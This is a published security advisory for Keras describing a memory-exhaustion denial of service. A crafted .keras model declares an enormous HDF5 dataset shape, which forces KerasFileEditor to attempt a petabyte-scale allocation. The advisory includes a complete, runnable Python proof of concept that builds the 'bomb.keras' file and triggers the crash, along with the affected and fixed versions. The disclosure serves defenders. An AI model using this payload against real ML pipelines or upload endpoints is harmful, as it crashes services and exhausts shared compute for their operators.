GHSA-mgx6-5cf9-rr43

Source
https://github.com/advisories/GHSA-mgx6-5cf9-rr43
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-mgx6-5cf9-rr43/GHSA-mgx6-5cf9-rr43.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-mgx6-5cf9-rr43
Aliases
Published
2026-05-06T23:09:37Z
Modified
2026-05-06T23:19:48.057022Z
Severity
  • 7.1 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N CVSS Calculator
Summary
Keras vulnerable to DoS via Malicious .keras Model (HDF5 Shape Bomb Causes Petabyte Allocation in KerasFileEditor)
Details

Summary

Keras’s model loader (KerasFileEditor) loads user-supplied .keras model files containing HDF5-based weight files without validating HDF5 dataset metadata. An attacker can craft a .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape (e.g. (50000000, 50000000)) but stores only a few bytes. The .keras file remains small (100–400 KB) because HDF5 with gzip compression stores minimal data.

During model loading, Keras executes:

result[key] = value[()]  # loads entire dataset into memory

value[()] instructs h5py to allocate RAM proportional to the dataset’s declared shape – in this case 8.88 PiB of memory. This results in:

  • Immediate memory exhaustion
  • Python / TensorFlow crashes
  • Jupyter kernel kills
  • System instability
  • Full denial of service on any workload that processes untrusted .keras models

This allows an attacker to crash any environment or pipeline that loads .keras models, including MLOps backends, training services, model upload endpoints, and automated pipelines.

Proof of Concept

# PoC.py
import zipfile
import io
import h5py
import numpy as np
from keras.saving import KerasFileEditor

# Create a malicious .keras model containing a massive HDF5 shape bomb
def create_malicious_keras(path="bomb.keras"):
    hdf5_bytes = io.BytesIO()

    # Create an HDF5 file with a huge declared dataset shape
    with h5py.File(hdf5_bytes, "w") as f:
        d = f.create_dataset(
            "payload",
            shape=(50_000_000, 50_000_000),    # Extremely large shape → petabytes on load
            dtype="float32",
            compression="gzip",
            compression_opts=9
        )
        # Write minimal data so the file stays very small
        d[0:1, 0:1] = np.zeros((1, 1), dtype=np.float32)

    hdf5_bytes.seek(0)

    # Build a valid .keras archive structure
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("config.json", "{}")
        z.writestr("metadata.json", "{}")
        z.writestr("model.weights.h5", hdf5_bytes.getvalue())

# Generate the malicious model file
create_malicious_keras()

# Trigger the DoS vulnerability when Keras loads the malicious file
KerasFileEditor("bomb.keras")

Expected Result

numpy._core._exceptions._ArrayMemoryError:
Unable to allocate 8.88 PiB for an array with shape (50000000, 50000000)

This crash occurs before any actual model processing, confirming the Denial-of-Service impact.

Impact

This vulnerability allows an attacker to crash any system that loads a malicious .keras model file.

The attacker can:

  • Cause immediate memory exhaustion (8+ PiB allocation attempts)
  • Crash TensorFlow / Python interpreter
  • Kill Jupyter kernels
  • Break automated model-upload pipelines
  • Crash MLOps servers that process user models
  • Deny service to shared GPU/CPU environments

If a platform allows user-uploaded Keras models (training services, inference endpoints, AutoML tools, Kaggle-style platforms), this becomes a remote denial-of-service vector.

Additional PoC Evidence (Video Demonstration)

Attached is a real-world proof-of-concept video demonstrating the crash and memory exhaustion when loading the malicious .keras model.

PoC Video (Google Drive): PoC Video

Finding: Critical memory-exhaustion flaw triggered by crafted .keras model files
Vector: Malicious metadata causing extreme tensor shape inflation
Impact: A 31 KB model forces an 8.88 PiB allocation attempt, immediately killing the process
Attack Scenario: Remote DoS on ML model processing pipelines and cloud inference services

Demonstration: The PoC video shows the crash occurring on Google Colab. Loading the malicious model consumed all system RAM and repeatedly terminated the runtime; after only a few tests, the compute quota dropped from 83 hours to 4 hours. With larger payloads, this would instantly exhaust resources in real production pipelines.

Database specific
{
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T23:09:37Z",
    "nvd_published_at": null
}
References

Affected packages

PyPI / keras

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
3.0.0
Fixed
3.12.1

Affected versions

3.*
3.0.0
3.0.1
3.0.2
3.0.3
3.0.4
3.0.5
3.1.0
3.1.1
3.2.0
3.2.1
3.3.0
3.3.1
3.3.2
3.3.3
3.4.0
3.4.1
3.5.0
3.6.0
3.7.0
3.8.0
3.9.0
3.9.1
3.9.2
3.10.0
3.11.0
3.11.1
3.11.2
3.11.3
3.12.0

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-mgx6-5cf9-rr43/GHSA-mgx6-5cf9-rr43.json"
last_known_affected_version_range
"<= 3.12.0"

PyPI / keras

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
3.13.0
Fixed
3.13.2

Affected versions

3.*
3.13.0
3.13.1

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-mgx6-5cf9-rr43/GHSA-mgx6-5cf9-rr43.json"
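Per the ranges above, a deployment can check its installed Keras version against the affected intervals. A hedged sketch: the introduced/fixed pairs are taken from this advisory, and the naive dot-split parser assumes plain X.Y.Z release strings (no rc/dev suffixes):

```python
# Affected intervals from this advisory, as [introduced, fixed) pairs.
AFFECTED_RANGES = [
    ((3, 0, 0), (3, 12, 1)),
    ((3, 13, 0), (3, 13, 2)),
]


def parse_version(v: str) -> tuple[int, ...]:
    # Naive parser: assumes a plain "X.Y.Z" release string.
    return tuple(int(part) for part in v.split("."))


def is_affected(version: str) -> bool:
    ver = parse_version(version)
    return any(lo <= ver < hi for lo, hi in AFFECTED_RANGES)
```

On an affected version, upgrading to 3.12.1 (or 3.13.2 on the 3.13 line) resolves the issue.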